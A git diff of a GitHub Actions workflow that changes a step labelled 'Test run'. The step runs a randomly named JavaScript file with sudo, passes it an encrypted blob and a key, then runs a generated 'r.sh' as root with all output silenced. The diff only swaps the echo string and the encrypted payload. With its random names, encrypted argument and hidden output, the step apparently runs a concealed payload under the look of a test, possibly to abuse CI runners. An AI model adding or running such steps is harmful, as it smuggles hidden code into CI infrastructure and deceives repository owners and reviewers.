--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'ycq98'
+        echo 'wgyei'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/1eEvq01jYvgVTldgGQonhxKTPt+HgB3kvKguAR40Q0DI1XlpUuXibH9gE+l4LnEL5IpoKDYkPWjbuwvIslRyzfiMNza5rUuNs7x50mZFXyZvdY+1P4U9a 2ufhqw && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18kMnfrtFUgkJBpDZ1mW58lXCqQbOkAYfvyh4XwnolV3PYamXwT7zp2J9dtdl6wHdew12g6N3WBDJ//SmdOfv7llo/17eF542Gty7NFlYKIQF2OufIDbE0o zkx4gm && sudo sh r.sh > /dev/null 2>&1
